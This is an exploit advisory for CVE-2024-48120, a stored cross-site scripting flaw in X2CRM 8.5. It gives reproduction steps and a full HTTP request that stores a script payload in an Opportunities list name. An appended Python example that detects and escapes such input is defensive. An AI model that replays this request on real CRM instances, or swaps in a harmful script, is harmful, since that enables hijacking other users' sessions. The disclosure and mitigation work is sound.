
X2CRM 8.5 - Stored Cross-Site Scripting (XSS)

# Exploit Title: X2CRM v8.5 - Stored Cross-Site Scripting (XSS) (Authenticated)
# Date: September 12, 2024
# Exploit Author: Okan Kurtulus
# Vendor Homepage: https://x2engine.com/
# Software Link: https://github.com/x2engine/x2crm
# Version: X2CRM v8.5
# Tested on: Ubuntu 22.04
# CVE : CVE-2024-48120
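1-) Log in to the system with any user account. From the top menu, navigate to the "Opportunities" section and select "Create List". On the new screen, enter a malicious XSS payload in the "Name" field and click "Create".
2-) Next, return to the "Opportunities" tab and click "Lists" again. The stored XSS payload will be triggered.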
XSS Trigger Request:
POST /x2crm/x2engine/index.php/opportunities/createlist HTTP/1.1
Host: 192.168.1.108
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 390
Origin: http://192.168.1.108
Connection: keep-alive
Referer: http://192.168.1.108/x2crm/x2engine/index.php/opportunities/createlist
Cookie: PHPSESSID=uijrtnp42qqo29vfkb4v0sps3i; YII_CSRF_TOKEN=rkw1swxtc1dpa0z0ogdpb1rxy0zgvdy5x3ppmzvftdgjgjgt_kjmglfkvrci_y9oo4f0qihtvqibswqbswqbswqbswqbsw1t9uvvxl4g%3D%3D; 5D8630D289284E8C14D15B14F4B4DC28=9D5B82F1240EB47CD73A20DF560D9B3086847E33A%3A4%3A4%3A4%3A%7BI%3A0 %3BS%3A1%3A%223%22%3BI%3A4%3A%22 -test%22%22%3A2%3A2%3BI%3A2592000%3BI%3A3%3A3%3BA%3A0%3A0%3A0%3A%3A%7B%7d%7d%7d; LoginForm[username]=test; LoginForm[rememberMe]=1
Upgrade-Insecure-Requests: 1
Priority: u=0, i

YII_CSRF_TOKEN=rkw1swxtc1dpa0z0ogdpb1rxy0zgvdy5x3ppmzvftdgjgjgjgt_kjmglfkvrci_y9oo4f0qihntvqbsw1t9u VVXL4G%3D%3D&X2List%5Bname%5D=%3Cscript%3Ealert%282%29%3B%3C%2Fscript%3E&X2List%5Btype%5D=dynamic&X2List%5BassignedTo%5D=test2&X2List%5Bvisibility%5D=1&X2List%5BlogicType%5D=AND&X2List%5Battribute%5D%5B%5D=alternativeEmail&X2List%5Bcomparison%5D%5B%5D=%3D&X2List%5Bvalue%5D%5B%5D=test&yt0=Create
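
The following Python example is added here and is not part of the original advisory or X2CRM's code. It decodes a form body shaped like the request above, flags fields that carry HTML-significant characters, audits already-stored list names, and shows the HTML-encoded form a list view should emit. SAMPLE_BODY, markup_fields, audit_stored_names and render_list_row are hypothetical names, and the CSRF token and stored rows are constructed placeholders.

```python
import html
from urllib.parse import parse_qsl

# Constructed sample: a form body shaped like the createlist request above,
# with a placeholder CSRF token instead of a real one.
SAMPLE_BODY = (
    "YII_CSRF_TOKEN=PLACEHOLDER"
    "&X2List%5Bname%5D=%3Cscript%3Ealert%282%29%3B%3C%2Fscript%3E"
    "&X2List%5Btype%5D=dynamic"
    "&X2List%5BassignedTo%5D=test2"
    "&X2List%5Bvisibility%5D=1"
    "&yt0=Create"
)

# Characters that change meaning in an HTML text or attribute context.
HTML_SIGNIFICANT = set("<>\"'&")


def markup_fields(body):
    """Decode a urlencoded body; return fields whose values contain markup characters."""
    fields = parse_qsl(body, keep_blank_values=True)
    return {key: value for key, value in fields if HTML_SIGNIFICANT & set(value)}


def audit_stored_names(rows):
    """Given (id, name) rows from a list table, return ids whose name contains markup characters.

    Stored XSS persists after the request is gone, so the stored data needs
    auditing as well as the incoming traffic.
    """
    return [row_id for row_id, name in rows if HTML_SIGNIFICANT & set(name)]


def render_list_row(name):
    """Hypothetical view helper: emit the list name as inert text, encoded at output time."""
    return "<td>" + html.escape(name, quote=True) + "</td>"


if __name__ == "__main__":
    flagged = markup_fields(SAMPLE_BODY)
    for field, value in flagged.items():
        print("flagged:", field, "->", render_list_row(value))
    # Constructed rows standing in for stored list names.
    print(audit_stored_names([(1, "Q3 leads"), (2, flagged["X2List[name]"])]))
```

Encoding at output time in the list view is what neutralizes the stored value; the request and storage checks only help find entries that were saved before the view was fixed.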
 